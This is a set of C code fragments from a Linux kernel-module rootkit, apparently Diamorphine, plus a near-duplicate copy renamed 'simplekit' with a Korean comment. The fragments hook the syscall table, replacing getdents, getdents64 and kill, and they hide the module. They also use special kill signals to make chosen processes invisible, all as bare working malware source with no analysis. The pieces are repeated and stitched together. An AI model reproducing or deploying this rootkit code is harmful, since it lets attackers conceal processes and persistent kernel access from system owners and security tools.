static int __init diamorphine_init(void) { unsigned int level; sys_call_table = get_syscall_table_bf(); if (!sys_call_table) return -1; pte = lookup_address((unsigned long)sys_call_table, &level); if (!pte) return -1; module_hide(); tidy(); orig_getdents = (orig_getdents_t)sys_call_table[__NR_getdents]; orig_getdents64 = (orig_getdents64_t)sys_call_table[__NR_getdents64]; orig_kill = (orig_kill_t)sys_call_table[__NR_kill]; unprotect_memory(); sys_call_table[__NR_getdents] = (unsigned long)hacked_getdents; sys_call_table[__NR_getdents64] = (unsigned long)hacked_getdents64; sys_call_table[__NR_kill] = (unsigned long)hacked_kill; protect_memory(); return 0; }
asmlinkage int hacked_kill(pid_t pid, int sig) { struct task_struct *task; switch (sig) { case SIGINVIS: if ((task = find_task(pid)) == NULL) return -ESRCH; task->flags ^= PF_INVISIBLE; break; case SIGMODINVIS: if (module_hidden) module_show(); else module_hide(); break; default: return orig_kill(pid, sig); } return 0; }
static int param_kmod_hide(const char *val, struct kernel_param *kp) { int ret; ret = param_set_bool(val, kp); if (ret) { #ifdef DEBUG printk(KERN_ALERT "%s error: could not parse LKM hideme parameters\n", MODULE_NAME); #endif return ret; } if (hideme) module_hide(); else module_show(); return 0; }
// 커널 모듈을 로드할 때 수행 static int __init simplekit_init(void) { sys_call_table = get_syscall_table_bf(); if (!sys_call_table) return -1; cr0 = read_cr0(); module_hide(); tidy(); orig_getdents = (orig_getdents_t)sys_call_table[__NR_getdents]; orig_getdents64 = (orig_getdents64_t)sys_call_table[__NR_getdents64]; orig_kill = (orig_kill_t)sys_call_table[__NR_kill]; unprotect_memory(); sys_call_table[__NR_getdents] = (unsigned long)hacked_getdents; sys_call_table[__NR_getdents64] = (unsigned long)hacked_getdents64; sys_call_table[__NR_kill] = (unsigned long)hacked_kill; protect_memory(); return 0; }